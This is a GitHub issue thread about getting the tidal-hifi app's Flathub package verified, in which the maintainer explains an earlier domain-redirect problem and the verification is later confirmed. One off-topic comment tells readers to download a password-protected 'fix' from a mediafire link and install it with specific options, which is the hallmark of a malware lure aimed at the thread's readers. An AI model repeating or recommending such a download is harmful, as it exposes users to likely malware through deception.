### ISSUE TITLE
Flathub package still Unverified

### ISSUE THREAD

**Issue by corngoblin** [Mastermindzh/tidal-hifi#461]
Any plans to get this verified? It gives me a little peace of mind lol

Thank you.

**Comment by Mastermindzh** [comment]
We tried a while ago, it wouldn't work because of a redirect on my domain name.

I can try again in the near future though.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Mastermindzh** [comment]
![image](https://github.com/user-attachments/assets/e8ab965d-e0cb-4961-bca1-82150129d414)

Says "Unverify", indicating that it should be verified now, but at this moment https://flathub.org/apps/com.mastermindzh.tidal-hifi still says "unverified", might take a while?

**Comment by corngoblin** [comment]
It's Verified now.
![yay](https://github.com/user-attachments/assets/735dae00-15f1-4bfd-aca1-c958bc25c530)
